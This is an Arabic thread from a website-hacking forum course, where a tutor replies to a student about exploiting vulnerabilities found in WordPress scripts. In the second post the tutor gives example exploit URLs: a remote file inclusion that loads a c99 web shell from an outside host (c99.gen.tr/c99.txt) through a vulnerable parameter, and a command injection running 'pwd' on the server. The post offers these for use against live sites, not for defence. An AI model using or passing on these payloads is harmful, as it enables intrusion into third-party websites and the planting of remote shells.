|ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

|ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات


النتائج 1 إلى 10 من 10

الموضوع: |ألدرس الخامس عشر| البحث عن الثغرات بالسكربتات

العرض المتطور

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1

    افتراضي رد: ~الدرس الثالث عشر~ البحث عن الثغرات بالسكربتات


    ما شاء الله تباركـ الله
    بطل كعادتكـ
    ياربي من جد كنت اتعب نفسي
    انزل السكربت وروح لي ملف ملف
    وابحث عن طريق المفكرة
    لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي
    هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
    اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
    ربي يعطيكــ
    بنتظار الدرس القادم .
    تحياتي .

  2. #2

    افتراضي رد: ~الدرس الثالث عشر~ البحث عن الثغرات بالسكربتات

    اقتباس المشاركة الأصلية كتبت بواسطة Z3r0-c00l مشاهدة المشاركة
    مشكوووور اخي يشرفني اكون اول من يرد على الدرس
    تقبل مروري ياغالي
    هلا فيك حبيبي
    بالتوفيق..
    اقتباس المشاركة الأصلية كتبت بواسطة اخلاقي تاج راسي مشاهدة المشاركة

    ما شاء الله تباركـ الله
    بطل كعادتكـ
    ياربي من جد كنت اتعب نفسي
    انزل السكربت وروح لي ملف ملف
    وابحث عن طريق المفكرة
    لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي
    هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
    اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
    ربي يعطيكــ
    بنتظار الدرس القادم .
    تحياتي .
    نورت اخوي 'اخلاقي'
    شوف يالغالي..
    بخصوص انك بعد ما تلاقي خطأء وتجيلك مشكلة انك كيف تعرف مسار الثغرة عشان تطبقها على الموقع..
    هاي سهله جدا, يعني لنفترض انك حملت سكربت وورد برسس عشان تفحصه يدوي على طريقتك انتي(اليدوية), ولنفترض كمان انك وجدت ثغرة داخل ملف wp-settings مثلاا..
    وهذا ملف الـwp-settings موجود على الرئيسيه في سكربت وورد برسس ولنفترض كمان انه الموقع مركب السكربت على الرئيسيه مش داخل مجلدات واذا بدك تدخل مثلا على لوحة التحكم تدخل هكذا
    www.site.com/wp-login.php
    وكمان نفس الشي اذا بدك تستعرض ملف wp-settings رح يكون الاستعراض هكذا
    www.site.com/wp-settings.php
    وكمان لنفترض انه الدالات المصابه هني على سبيل المثال: qx ودالة اخرى اسمها aljyyosh ونوع الثغرة لنفترض كمان انها ثغرة الفايل انكلود File Include وثغرة الفايل انكلود لازم يكون معك شل بصيغة txt مرفوع موقع عادي
    الاستغلال راح يكون هيك:
    www.site.com/wp-settings.php?qx=http://c99.gen.tr/c99.txt?
    http://c99.gen.tr/c99.txt? :: هذا الشل الي بصيغة تكست
    وكمان بنفع يكون الاستغلال هيك:
    www.site.com/wp-settings.php?aljyyosh=http://c99.gen.tr/c99.txt?

    ونفس الشي اذا كانت الثغرة موجوده داخل مجلد او مجلدات., مثلا داخل هذا المسار wp-content\themes\twentyten والملف المصاب archive مثلا.. والدالة المصابة qx, ونوع الثغرة الكوماند,, الاستغلال رح يكون هيك
    www.site.com/wp-content/themes/twentyten/archive.php?qx=pwd
    pwd :: امر من وامر الينكس يعرض لك مسارك على السيرفر

    بالتوفيق لك اخوي..

المواضيع المتشابهه

  1. [الدرس الثالث] انواع الثغرات
    بواسطة ASDELY-ScOrPiOn في المنتدى دورة اختراق المواقع
    مشاركات: 223
    آخر مشاركة: 06-01-2021, 10:49 AM
  2. الدرس الثالث: البحث عن الثغرات ورفع الشيل
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 454
    آخر مشاركة: 06-09-2012, 12:52 AM
  3. طريقة البحث عن الثغرات وايجادها خاص بالمبتدئين
    بواسطة مدمر القراصنة في المنتدى قسم الثغرات
    مشاركات: 67
    آخر مشاركة: 02-14-2012, 04:32 PM
  4. الدرس الاول - البحث عن الثغرات في ميلوورم وتطبيق على ثغرة Sql injection
    بواسطة الشريف 515 في المنتدى منتدى الإختراق العام
    مشاركات: 3
    آخر مشاركة: 09-28-2010, 12:39 AM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •